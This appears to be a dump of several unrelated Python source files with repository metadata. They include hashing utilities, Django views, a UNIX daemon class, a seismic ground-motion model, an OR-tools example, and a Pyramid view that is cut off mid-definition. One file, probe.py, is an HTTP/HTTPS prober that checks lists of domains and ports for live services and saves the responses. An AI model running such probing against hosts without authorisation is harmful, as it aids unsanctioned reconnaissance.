| 0
| 0
|
MIT
| 2018-10-23T08:37:40
| 2018-10-23T08:37:39
| null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
"""
Crypto Utils
"""
import base64
import json
from hashlib import sha256
from helios_lib.exceptions import JsonLoadParserError
def hash_b64(s):
"""
hash the string using sha1 and produce a base64 output
removes the trailing "="
"""
hasher = sha256(s)
result = base64.b64encode(hasher.digest())[:-1]
return result
def to_json(d):
return json.dumps(d, sort_keys=True, separators=(',', ':'))
def from_json(json_str):
if not json_str: return None
try:
return json.loads(json_str)
except ValueError:
raise JsonLoadParserError
|
[
"or@omidraha.com"
] |
or@omidraha.com
|
bec123799a98b6a447f713cfda3bd0c097b107c5
|
7fd95d9a8d9a82e177264ead50b06c9b4dc7b7a4
|
/blog/views.py
|
b2ea38000b1c5d366a6dadf764cac0e2c2dba30e
|
[] |
no_license
|
NielleLopes/djangogirls
|
547ab450be42cc33aa9f16e8848ca3720c1d141a
|
b9d9c71cf61d3c73c3768cac2f5191b288eeade8
|
refs/heads/master
| 2020-11-24T07:28:52.459945
| 2019-12-14T20:48:33
| 2019-12-14T20:48:33
| 228,030,126
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
from django.shortcuts import render
from django.utils import timezone
from .models import Post
# Create your views here.
def post_list(request):
Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {})
|
[
"voce@exemplo.com"
] |
voce@exemplo.com
|
826a2431497d442f827dfbae44156952aa5d84a8
|
c773734730cbb434080cef954e949fc69f9a9852
|
/daemon.py
|
b8cfac880adc75f070e34bd3d66416c1dc11df77
|
[] |
no_license
|
zjr/GitHookDaemon
|
de19e1605cf6735ffd21bb904b97bf0a0ecd58eb
|
00524beac612c3d115e31c3061d5c4fc22294a76
|
refs/heads/master
| 2020-06-02T22:43:20.279887
| 2013-03-12T23:40:26
| 2013-03-12T23:40:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,784
|
py
|
#!/usr/bin/env python2.7
import sys
import os
import time
import atexit
from signal import SIGTERM
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(
self,
pidfile,
stdin='/dev/null',
stdout='/dev/null',
stderr='/dev/null'):
self.pidfile = pidfile
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write(
"fork #1 failed: %d (%s)\n"
% (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write(
"fork #2 failed: %d (%s)\n"
% (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
file(self.pidfile, 'w+').write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile, 'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exist. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the daemon
self.daemonize()
self.run()
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile, 'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def restart(self):
"""
Restart the daemon
"""
self.stop()
self.start()
def run(self):
"""
You should override this method when you subclass Daemon.
It will be called after the process has been daemonized by
start() or restart().
"""
|
[
"me@zjr.io"
] |
me@zjr.io
|
1f53791c6367f2212e2ada3d469cfcabe175a760
|
b9ae6375b98ffae9b2d38fd7e34453ca1946fb9e
|
/epsilon/views.py
|
4d265106990f88e33c782d89148dc4b73978a552
|
[
"MIT"
] |
permissive
|
atlednolispe/blog
|
93f4f68922f640dab5a954b7c3218d532e012ee6
|
d3926e424d544f3e9a3805b16a15072ac6c6a780
|
refs/heads/master
| 2022-12-13T23:16:29.145704
| 2018-02-28T08:37:43
| 2018-02-28T08:37:43
| 120,314,098
| 0
| 0
|
MIT
| 2022-11-22T02:13:02
| 2018-02-05T14:16:48
|
CSS
|
UTF-8
|
Python
| false
| false
| 2,393
|
py
|
# import logging
from django.core.cache import cache
from django.views.generic import ListView, DetailView, TemplateView
from blog.views import CommonMixin
# from blog.test_util import time_it
from comment.views import CommentShowMixin
from .models import Post, Tag
# logger = logging.getLogger(__name__)
class BasePostView(CommonMixin, ListView):
model = Post
template_name = 'solid_state/elements.html'
context_object_name = 'posts'
paginate_by = 3
ordering = '-id'
class IndexView(TemplateView):
template_name = 'aerial/index.html'
class PostIndexView(BasePostView):
# @time_it
def get_queryset(self):
query = self.request.GET.get('query')
# logger.info('query: [%s]', query)
qs = BasePostView.get_queryset(self)
if query:
qs = qs.filter(title__icontains=query)
# logger.debug('query result: [%s]', qs)
return qs
def get_context_data(self, **kwargs):
query = self.request.GET.get('query')
return super().get_context_data(query=query)
class CategoryView(BasePostView):
def get_queryset(self):
qs = BasePostView.get_queryset(self)
cate_id = self.kwargs.get('category_id')
qs = qs.filter(category_id=cate_id)
return qs
class TagView(BasePostView):
def get_queryset(self):
tag_id = self.kwargs.get('tag_id')
try:
tag = Tag.objects.get(id=tag_id)
except Tag.DoesNotExist:
return []
posts = tag.post_set.all()
return posts
class PostView(CommonMixin, CommentShowMixin, DetailView):
model = Post
template_name = 'solid_state/generic.html'
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
self.pv_uv()
return response
def pv_uv(self):
# self.object.pv += 1
# self.object.uv += 1
# self.object.save()
sessionid = self.request.COOKIES.get('sessionid')
if not sessionid:
return
pv_key = 'pv:%s:%s' % (sessionid, self.request.path)
if not cache.get(pv_key):
self.object.increase_pv()
cache.set(pv_key, 1, 30)
uv_key = 'uv:%s:%s' % (sessionid, self.request.path)
if not cache.get(uv_key):
self.object.increase_uv()
cache.set(uv_key, 1, 60*60*24)
|
[
"atlednolispe@gmail.com"
] |
atlednolispe@gmail.com
|
ba430f34c33e6f2def7f7405d3d6c58f5ee06de5
|
7e6e3b4929ecae9c010478149670f28d9e6beb29
|
/pygmm/abrahamson_silva_kamai_2014.py
|
eb5b12d44aa1ea7a3096abe1e2594e2fe3cea493
|
[
"MIT",
"ISC"
] |
permissive
|
nassermarafi/pygmm
|
8312740bd6f37c7f837dc18723e52f16d417e229
|
b97c1cbe85522bc7e546c99ec99ed902163cb000
|
refs/heads/master
| 2021-01-13T08:57:13.669149
| 2016-03-29T05:48:36
| 2016-03-29T05:48:36
| 54,947,879
| 0
| 2
| null | 2016-03-29T05:18:39
| 2016-03-29T05:18:39
| null |
UTF-8
|
Python
| false
| false
| 14,143
|
py
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import division
import numpy as np
from scipy.interpolate import interp1d
from . import model
__author__ = 'Albert Kottke'
class AbrahamsonSilvaKamai2014(model.Model):
"""Abrahamson, Silva, and Kamai (2014, :cite:`abrahamson14`) model.
This model was developed for active tectonic regions as part of the
NGA-West2 effort.
"""
NAME = 'Abrahamson, Silva, & Kamai (2014)'
ABBREV = 'ASK14'
# Reference velocity (m/sec)
V_REF = 1180.
# Load the coefficients for the model
COEFF = model.load_data_file('abrahamson_silva_kamai_2014.csv', 2)
PERIODS = COEFF['period']
INDICES_PSA = np.arange(22)
INDEX_PGA = -2
INDEX_PGV = -1
PARAMS = [
model.NumericParameter('dist_rup', True, None, 300),
model.NumericParameter('dist_jb', True),
model.NumericParameter('mag', True, 3, 8.5),
model.NumericParameter('v_s30', True, 180, 1000),
model.NumericParameter('depth_1_0', False),
model.NumericParameter('depth_tor', False),
model.NumericParameter('dip', True),
model.NumericParameter('dist_crjb', False, default=15),
model.NumericParameter('dist_x', False),
model.NumericParameter('dist_y0', False),
model.NumericParameter('width', False),
model.CategoricalParameter('mechanism', True, ['SS', 'NS', 'RS']),
model.CategoricalParameter(
'region', False,
['global', 'california', 'china', 'italy', 'japan', 'taiwan'],
'global'
),
model.CategoricalParameter(
'vs_source', False, ['measured', 'inferred'], 'measured'),
model.CategoricalParameter(
'is_aftershock', False, [True, False], False),
model.CategoricalParameter('on_hanging_wall', False,
[True, False], False),
]
def _check_inputs(self, **kwds):
super(AbrahamsonSilvaKamai2014, self)._check_inputs(**kwds)
p = self.params
if p['width'] is None:
p['width'] = self.calc_width(p['mag'], p['dip'])
if p['depth_tor'] is None:
p['depth_tor'] = self.calc_depth_tor(p['mag'])
def __init__(self, **kwds):
"""Initialize the model.
Keyword Args:
depth_1_0 (Optional[float]): depth to the 1.0 km∕s shear-wave
velocity horizon beneath the site, :math:`Z_{1.0}` in (km).
Used to estimate `depth_2_5`.
depth_2_5 (Optional[float]): depth to the 2.5 km∕s shear-wave
velocity horizon beneath the site, :math:`Z_{2.5}` in (km).
If *None*, then it is computed from `depth_1_0` or `v_s30`
and the `region` parameter.
depth_tor (Optional[float]): depth to the top of the rupture
plane (:math:`Z_{tor}`, km). If *None*, then the average
model is used.
depth_bor (Optional[float]): depth to the bottom of the rupture
plane (:math:`Z_{bor}`, km). If *None*, then the average
model is used.
dip (float): fault dip angle (:math:`\phi`, deg).
dist_jb (float): Joyner-Boore distance to the rupture plane
(:math:`R_\\text{JB}`, km)
dist_rup (float): closest distance to the rupture plane
(:math:`R_\\text{rup}`, km)
dist_x (float): site coordinate measured perpendicular to the
fault strike from the fault line with the down-dip direction
being positive (:math:`R_x`, km).
dist_y0 (Optional[float]): the horizontal distance off the end of
the rupture measured parallel to strike (:math:`R_{y0}`, km).
mag (float): moment magnitude of the event (:math:`M_w`)
mechanism (str): fault mechanism. Valid options: "SS", "NS", "RS".
on_hanging_wall (Optional[bool]): If the site is located on the
hanging wall of the fault. If *None*, then *False* is assumed.
region (Optional[str]): region. Valid options: "global",
"california", "china", "italy", "japan", "taiwan". If *None*,
then "global" is used as a default value.
v_s30 (float): time-averaged shear-wave velocity over the top 30 m
of the site (:math:`V_{s30}`, m/s).
vs_source (Optional[str]): source of the `v_s30` value. Valid
options: "measured", "inferred"
width (Optional[float]): Down-dip width of the fault. If *None*,
then the model average is used.
"""
super(AbrahamsonSilvaKamai2014, self).__init__(**kwds)
# Compute the response at the reference velocity
resp_ref = np.exp(self._calc_ln_resp(self.V_REF, np.nan))
self._ln_resp = self._calc_ln_resp(self.params['v_s30'], resp_ref)
self._ln_std = self._calc_ln_std(resp_ref)
def _calc_ln_resp(self, v_s30, resp_ref):
"""Calculate the natural logarithm of the response.
Args:
v_s30 (float): site condition. Set `v_s30` to the reference
velocity (e.g., 1180 m/s) for the reference response.
resp_ref (Optional[:class:`np.array`]): response at the reference
condition. Required if `v_s30` is not equal to reference
velocity.
Returns:
:class:`np.array`: Natural log of the response.
"""
c = self.COEFF
p = self.params
# Magnitude scaling
f1 = self._calc_f1()
if p['on_hanging_wall']:
# Hanging-wall term
f4 = self._calc_f4()
else:
f4 = 0
# Depth to top of rupture term
f6 = c.a15 * np.clip(p['depth_tor'] / 20, 0, 1)
# Style of faulting
if p['mechanism'] == 'RS':
f7 = c.a11 * np.clip(p['mag'] - 4, 0, 1)
f8 = 0
elif p['mechanism'] == 'NS':
f7 = 0
f8 = c.a12 * np.clip(p['mag'] - 4, 0, 1)
else:
f7, f8 = 0, 0
# Site term
###########
v_1 = np.exp(-0.35 * np.log(np.clip(c.period, 0.5, 3) / 0.5) +
np.log(1500))
vs_ratio = np.minimum(v_s30, v_1) / c.v_lin
# Linear site model
f5 = (c.a10 + c.b * c.n) * np.log(vs_ratio)
# Nonlinear model
mask = vs_ratio < 1
f5[mask] = (
c.a10 * np.log(vs_ratio) -
c.b * np.log(resp_ref + c.c) +
c.b * np.log(resp_ref + c.c * vs_ratio ** c.n)
)[mask]
# Basin term
if v_s30 == self.V_REF or p['depth_1_0'] is None:
# No basin response
f10 = 0
else:
# Ratio between site depth_1_0 and model center
ln_depth_ratio = np.log(
(p['depth_1_0'] + 0.01) /
(self.calc_depth_1_0(v_s30, p['region']) + 0.01)
)
slope = interp1d(
[150, 250, 400, 700],
np.c_[c.a43, c.a44, c.a45, c.a46],
copy=False,
bounds_error=False,
fill_value=(c.a43, c.a46),
)(v_s30)
f10 = slope * ln_depth_ratio
# Aftershock term
if p['is_aftershock']:
f11 = c.a14 * np.clip(1 - (p['dist_crjb'] - 5) / 10, 0, 1)
else:
f11 = 0
if p['region'] == 'taiwan':
freg = c.a31 * np.log(vs_ratio) + c.a25 * p['dist_rup']
elif p['region'] == 'china':
freg = c.a28 * p['dist_rup']
elif p['region'] == 'japan':
f13 = interp1d(
[150, 250, 350, 450, 600, 850, 1150],
np.c_[c.a36, c.a37, c.a38, c.a39, c.a40, c.a41, c.a42],
copy=False,
bounds_error=False,
fill_value=(c.a36, c.a42),
)(v_s30)
freg = f13 + c.a29 * p['dist_rup']
else:
freg = 0
return f1 + f4 + f5 + f6 + f7 + f8 + f10 + f11 + freg
def _calc_ln_std(self, psa_ref):
"""Calculate the logarithmic standard deviation.
Returns:
:class:`np.array`: Logarithmic standard deviation.
"""
p = self.params
c = self.COEFF
if p['region'] == 'japan':
phi_al = c.s5 + (c.s6 - c.s5) * np.clip((p['dist_rup'] - 30) / 50,
0, 1)
else:
transition = np.clip((p['mag'] - 4) / 2, 0, 1)
if p['vs_source'] == 'measured':
phi_al = c.s1m + (c.s2m - c.s1m) * transition
else:
phi_al = c.s1e + (c.s2e - c.s1e) * transition
tau_al = c.s3 + (c.s4 - c.s3) * np.clip((p['mag'] - 5) / 2, 0, 1)
tau_b = tau_al
# Remove period independent site amplification uncertainty of 0.4
phi_amp = 0.4
phi_b = np.sqrt(phi_al ** 2 - phi_amp ** 2)
# The partial derivative of the amplification with respect to
# the reference intensity
deriv = ((-c.b * psa_ref) / (psa_ref + c.c) +
(c.b * psa_ref) /
(psa_ref + c.c * (p['v_s30'] / c.v_lin) ** c.n))
deriv[p['v_s30'] >= c.v_lin] = 0
tau = tau_b * (1 + deriv)
phi = np.sqrt(phi_b ** 2 * (1 + deriv) ** 2 + phi_amp ** 2)
ln_std = np.sqrt(phi ** 2 + tau ** 2)
return ln_std
@staticmethod
def calc_width(mag, dip):
"""Compute the fault width based on equation in NGW2 spreadsheet.
This equation is not provided in the paper.
Args:
mag (float): moment magnitude of the event (:math:`M_w`)
dip (float): Fault dip angle (:math:`\phi`, deg)
Returns:
float: estimated fault width (:math:`W`, km)
"""
return min(
18 / np.sin(np.radians(dip)),
10 ** (-1.75 + 0.45 * mag)
)
@staticmethod
def calc_depth_tor(mag):
"""Calculate the depth to top of rupture (km).
Args:
mag (float): moment magnitude of the event (:math:`M_w`)
Returns:
float: estimated depth (km)
"""
return np.interp(mag, [5., 7.2], [7.8, 0])
@staticmethod
def calc_depth_1_0(v_s30, region='california'):
"""Estimate the depth to 1 km/sec horizon (:math:`Z_{1.0}`) based on
:math:`V_{s30}` and region.
This is based on equations 18 and 19 in the :cite:`abrahamson14`
and differs from the equations in the :cite:`chiou14`.
Args:
v_s30 (float): time-averaged shear-wave velocity over the top 30 m
of the site (:math:`V_{s30}`, m/s).
Keyword Args:
region (Optional[str]): region of basin model. Valid options:
"california", "japan". If *None*, then "california" is used as
the default value.
Returns:
float: depth to a shear-wave velocity of 1,000 m/sec
(:math:`Z_{1.0}`, km).
"""
if region in ['japan']:
# Japan
power = 2
v_ref = 412
slope = -5.23 / power
else:
# Global
power = 4
v_ref = 610
slope = -7.67 / power
return np.exp(slope * np.log((v_s30 ** power + v_ref ** power) /
(1360. ** power + v_ref ** power))) / 1000
def _calc_f1(self):
"""Calculate the magnitude scaling parameter f1.
Returns:
:class:`np.array`: Model parameter f1.
"""
c = self.COEFF
p = self.params
# Magnitude dependent taper
dist = np.sqrt(
p['dist_rup'] ** 2 +
(c.c4 - (c.c4 - 1) * np.clip(5 - p['mag'], 0, 1)) ** 2
)
# Magnitude scaling
# Need to copy c.a1 to that it isn't modified during the following
# operations.
f1 = np.array(c.a1)
ma1 = (p['mag'] <= c.m2)
f1[ma1] += (
c.a4 * (c.m2 - c.m1) + c.a8 * (8.5 - c.m2) ** 2 +
c.a6 * (p['mag'] - c.m2) +
c.a7 * (p['mag'] - c.m2) +
(c.a2 + c.a3 * (c.m2 - c.m1)) * np.log(dist) +
c.a17 * p['dist_rup']
)[ma1]
f1[~ma1] += (
c.a8 * (8.5 - p['mag']) ** 2 +
(c.a2 + c.a3 * (p['mag'] - c.m1)) * np.log(dist) +
c.a17 * p['dist_rup']
)[~ma1]
ma2 = np.logical_and(~ma1, p['mag'] <= c.m1)
f1[ma2] += (c.a4 * (p['mag'] - c.m1))[ma2]
ma3 = np.logical_and(~ma1, p['mag'] > c.m1)
f1[ma3] += (c.a5 * (p['mag'] - c.m1))[ma3]
return f1
def _calc_f4(self):
"""Calculate the hanging-wall parameter f4.
Returns:
:class:`np.array`: Model parameter f4.
"""
# Move this into a decorator?
c = self.COEFF
p = self.params
t1 = min(90 - p['dip'], 60) / 45
# Constant from page 1041
a2hw = 0.2
if p['mag'] <= 5.5:
t2 = 0
elif p['mag'] < 6.5:
t2 = (1 + a2hw * (p['mag'] - 6.5) -
(1 - a2hw) * (p['mag'] - 6.5) ** 2)
else:
t2 = 1 + a2hw * (p['mag'] - 6.5)
# Constants defined on page 1040
r1 = p['width'] * np.cos(np.radians(p['dip']))
r2 = 3 * r1
h1 = 0.25
h2 = 1.5
h3 = -0.75
if p['dist_x'] < r1:
t3 = h1 + h2 * (p['dist_x'] / r1) + h3 * (p['dist_x'] / r1) ** 2
elif p['dist_x'] < r2:
t3 = 1 - ((p['dist_x'] - r1) / (r2 - r1))
else:
t3 = 0
t4 = np.clip(1 - p['depth_tor'] ** 2 / 100, 0, 1)
if p['dist_y0'] is None:
t5 = np.clip(1 - p['dist_jb'] / 30, 0, 1)
else:
dist_y1 = p['dist_x'] * np.tan(np.radians(20))
t5 = np.clip(1 - (p['dist_y0'] - dist_y1) / 5, 0, 1)
f4 = c.a13 * t1 * t2 * t3 * t4 * t5
return f4
|
[
"albert.kottke@gmail.com"
] |
albert.kottke@gmail.com
|
2d3f92f71fc31f4d7c139c4fdc29e656d9688f0e
|
8fcc27160f8700be46296568260fa0017a0b3004
|
/client/poser.py
|
cd36493534803bad45f413ccf12f09d8e1e82ef2
|
[] |
no_license
|
connoryang/dec-eve-serenity
|
5d867f4eedfa896a4ef60f92556356cafd632c96
|
b670aec7c8b4514fc47cd52e186d7ccf3aabb69e
|
refs/heads/master
| 2021-01-22T06:33:16.303760
| 2016-03-16T15:15:32
| 2016-03-16T15:15:32
| 56,389,750
| 1
| 0
| null | 2016-04-16T15:05:24
| 2016-04-16T15:05:24
| null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\common\modules\nice\client\_nastyspace\poser.py
from eve.devtools.script.svc_poser import Starbase
from eve.devtools.script.svc_poser import Structure
|
[
"masaho.shiro@gmail.com"
] |
masaho.shiro@gmail.com
|
8d3242c598f713960953ae179e75d5bd44a35ab9
|
fbe58422d18bd94e1c2321eb30aa494c876d2ff6
|
/GLOP_first_example.py
|
be8493a7cf9e97ce1952fdad21192264743dbe74
|
[] |
no_license
|
KKAnumalasetty/OR-tools
|
3e6a5e46e53ce23fecd6ea4a77e2016d08a1977d
|
e80c41873ecc04c40eaaa75e4fbfc1d983db9a1e
|
refs/heads/master
| 2021-03-22T07:37:27.000081
| 2019-10-09T06:16:30
| 2019-10-09T06:16:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,677
|
py
|
# -*- coding: utf-8 -*-
"""
GLOP
@author: Lalith
"""
from ortools.linear_solver import pywraplp
def LinearProgrammingExample():
# Instantiate a Glop solver
solver = pywraplp.Solver('LinearProgrammingExample',
pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)
# Creating 2 variables; They are unconstrained
x = solver.NumVar(-solver.infinity(), solver.infinity(), 'x')
y = solver.NumVar(-solver.infinity(), solver.infinity(), 'y')
# Constraint 0: x + 2y <= 14.
constraint0 = solver.Constraint(-solver.infinity(), 14)
constraint0.SetCoefficient(x, 1)
constraint0.SetCoefficient(y, 2)
# Constraint 1: 3x - y >= 0.
constraint1 = solver.Constraint(0, solver.infinity())
constraint1.SetCoefficient(x, 3)
constraint1.SetCoefficient(y, -1)
# Constraint 2: x - y <= 2.
constraint2 = solver.Constraint(-solver.infinity(), 2)
constraint2.SetCoefficient(x, 1)
constraint2.SetCoefficient(y, -1)
# Objective function: 3x + 4y.
objective = solver.Objective()
objective.SetCoefficient(x, 3)
objective.SetCoefficient(y, 4)
objective.SetMaximization()
# Solve the system.
solver.Solve()
opt_solution = 3 * x.solution_value() + 4 * y.solution_value()
print('Number of variables =', solver.NumVariables())
print('Number of constraints =', solver.NumConstraints())
# The value of each variable in the solution.
print('Solution:')
print('x = ', x.solution_value())
print('y = ', y.solution_value())
# The objective value of the solution.
print('Optimal objective value =', opt_solution)
LinearProgrammingExample()
|
[
"lalithsrivatsa@users.noreply.github.com"
] |
lalithsrivatsa@users.noreply.github.com
|
ff6fe46dc0de7a4bf4e70750265b0268ffbf82b7
|
daf1c67652d178f7d6aab787d5a7816624c3b032
|
/build/catkin_generated/order_packages.py
|
4259e38afe23f5a4bfe9577abfc8561a1b31d8e8
|
[] |
no_license
|
Kushagraw12/Drone-simulation
|
04d2fb83f955b1127f236a9f2d9cfe92573465f9
|
37acc100f61c0d48e86678c94bc1ce1be06c9789
|
refs/heads/master
| 2023-01-21T10:23:35.611100
| 2020-11-30T21:20:41
| 2020-11-30T21:20:41
| 317,338,359
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 448
|
py
|
# generated from catkin/cmake/template/order_packages.context.py.in
source_root_dir = '/home/kush/Desktop/sem3/en203/src'
whitelisted_packages = ''.split(';') if '' != '' else []
blacklisted_packages = ''.split(';') if '' != '' else []
underlay_workspaces = '/home/kush/Desktop/sem3/en203/devel;/home/kush/catkin_ws/devel;/opt/ros/noetic'.split(';') if '/home/kush/Desktop/sem3/en203/devel;/home/kush/catkin_ws/devel;/opt/ros/noetic' != '' else []
|
[
"wadhwakushagra01@gmail.com"
] |
wadhwakushagra01@gmail.com
|
9b1ffa4556961c5aa4f5cbebf9853c8c7b2711b7
|
c461d817e155e3d18647108fb31129d815e04649
|
/Introduction_to_Python/Numeric.py
|
c4f0fd407e63387660209493b77d712f35f43a6d
|
[] |
no_license
|
OpentoWorld/PythonCodes
|
8f84ddc965038754c4b08afb91a74c2ac762bc04
|
f65e17bd7f4938c894109fa8195abe27790ef061
|
refs/heads/master
| 2020-08-28T10:29:33.892348
| 2020-01-23T09:09:23
| 2020-01-23T09:09:23
| 217,673,334
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29
|
py
|
a=5
b=5.5
c=6+5j
print(a,b,c)
|
[
"noreply@github.com"
] |
OpentoWorld.noreply@github.com
|
c25e226899bc11fffc3b0bd3d9d99a106e4c3f48
|
52ba554bfaa5bd679035cb2858f9c90327201915
|
/probe.py
|
594afd3c73dcafc7af461c8ab55eaeb0fe976fca
|
[] |
no_license
|
benchungiscool/pyprobe
|
3ec5087b46460dd915bb8dd1aa3cec424b281558
|
39ea809f06550fb9f72e4b449567e02d3b6a4908
|
refs/heads/master
| 2022-11-05T07:49:52.731606
| 2020-06-19T18:40:19
| 2020-06-19T18:40:19
| 254,963,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,556
|
py
|
from concurrent.futures import ThreadPoolExecutor
import time
import requests
import sys
import os
## What to do if no input is given
if len(sys.argv) == 1:
print("Please provide an input such as: probe.py domains.txt",
"For more help do probe.py -h")
exit()
## Take input from the run command
arguments = sys.argv[1:]
## Prints the help data
def DisplayHelp():
with open("help.txt", "r") as file:
help = file.readlines()
seperator = "\n"
print(seperator.join(help))
exit()
## Process input from a textfile
def ProcessInput(file):
## Find the file specified
folder = os.path.dirname(os.path.abspath(file))
file = os.path.join(folder, file)
## Read from file
with open(file, "r") as file:
data = file.readlines()
## Removes all linebreaks from returned data
data = [item.replace("\n", "") for item in data]
## Removes blank items in data
data = [item for item in data if item]
index = len(data) // 2
if index > 1:
return data[index:], data[:index]
return data
## Returns headers for the request
def ConstructHeaders():
return {
'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-GB,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': "1",
'Connection': 'close'
}
## Store result in a text file
def StoreResult(domain, port, content, code, verbose=False,
fail=False, http=False, https=False):
if not os.path.isdir(domain):
os.mkdir(domain)
os.chdir(domain)
## Print response status if in verbose mode
if verbose and not fail:
if http:
print("http://"+domain+":"+port, code)
if https:
print("https://"+domain+":"+port, code)
## Write response to file
with open(domain+str(code)+".html", "w") as file:
file.write(str(content))
file.close()
## Move up ready for next write
os.chdir("..")
## Request worker
def TestForService(domain, port, session, verbose):
## Make some headers for a request
headers = ConstructHeaders()
## Construct http request
req = requests.Request("GET", "http://"+domain+":"+str(port),
headers=headers)
prepped = req.prepare()
## Send request
try:
r = session.send(prepped, timeout=3)
StoreResult(domain, port, r.text, r.status_code, verbose=verbose,
http=True)
## If request doesn't work, move on
except:
pass
## Construct https request
req = requests.Request("GET", "https://"+domain+":"+str(port),
headers=headers)
prepped = req.prepare()
## Send request
try:
session.send(prepped, timeout=3)
StoreResult(domain, port, r.text, r.status_code,
verbose=verbose, https=True)
## If it doesn't work, move on
except:
pass
## Inititate scan
def SendRequests(domains, ports, verbose):
## If not in output dir, check if exists, if not create one
if "/out" not in os.getcwd():
if not os.path.isdir("out"):
os.mkdir("out")
os.chdir("out")
session = requests.Session()
for domain in domains:
for port in ports:
TestForService(domain, port, session, verbose)
## Checks if the user has called help mode
if "-h" in arguments:
DisplayHelp()
## Check for verbose mode, set to False by default
verbose = False
if "-v" in arguments:
verbose = True
## Information Parser
for argument in arguments:
## Process ports supplied by user
ports = ["80","443"]
if "-p" in argument:
argument.replace("-p", "")
argument = argument.split(",")
for port in argument:
ports.append(str(port))
## Process domains supplied by user
if ".txt" in argument:
argument = os.path.realpath(argument)
domains = ProcessInput(argument)
if __name__ == "__main__":
index = len(domains)
if index > 1:
time1 = time.time()
executors_list = []
with ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(SendRequests, domains[0], ports, verbose)
executor.submit(SendRequests, domains[1], ports, verbose)
else:
SendRequests(domains, ports, verbose)
|
[
"benchung61@gmail.com"
] |
benchung61@gmail.com
|
98d7b77bd4dcb42afc88107f439946ee04d57359
|
557d51cd6c7459f3492f6e5e6a44e10b9026b805
|
/osipkd/views/aset/kibf.py
|
07b8c5377ec39a4afad0f7f9e9292ab5862d534a
|
[] |
no_license
|
aagusti/zosipkd
|
e6a3bd8ca71b240dc3141c89dba252291c2c9ea7
|
fbb4fcc74d772a9f1692a4e8b45cb63ce77e85f2
|
refs/heads/master
| 2021-01-17T10:23:14.182025
| 2016-05-04T07:34:05
| 2016-05-04T07:34:05
| 28,517,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,824
|
py
|
import os
import uuid
from osipkd.tools import row2dict, xls_reader
from datetime import datetime
from sqlalchemy import not_, func, or_
from pyramid.view import (
view_config,
)
from pyramid.httpexceptions import (
HTTPFound,
)
import colander
from deform import (
Form,
widget,
ValidationFailure,
)
from osipkd.models import (
DBSession,
Group
)
from kibs import KibSchema
from osipkd.models.aset_models import AsetKategori, AsetKib, AsetPemilik
from datatables import ColumnDT, DataTables
from osipkd.views.base_view import BaseViews
from osipkd.models.pemda_model import Unit
SESS_ADD_FAILED = 'Tambah kibf gagal'
SESS_EDIT_FAILED = 'Edit kibf gagal'
KAT_PREFIX = '06'
kat_widget = widget.AutocompleteInputWidget(
size=60,
values = '/aset/kibf/headofnama/act',
min_length=1)
def deferred_bertingkat(node, kw):
values = kw.get('bertingkat', [])
return widget.SelectWidget(values=values)
bertingkat = (
('Tidak', 'Tidak'),
('Bertingkat', 'Bertingkat'),
)
def deferred_beton(node, kw):
values = kw.get('beton', [])
return widget.SelectWidget(values=values)
beton = (
('Tidak', 'Tidak'),
('Beton', 'Beton'),
)
class AddSchema(KibSchema):
kib = colander.SchemaNode(
colander.String(),
default='F',
title="KIB",
oid="kib")
f_bertingkat_tidak = colander.SchemaNode(
colander.String(),
widget=widget.SelectWidget(values=bertingkat),
#missing = colander.drop,
default = 'Tidak',
oid="f_bertingkat_tidak",
title="Bertingkat")
f_beton_tidak = colander.SchemaNode(
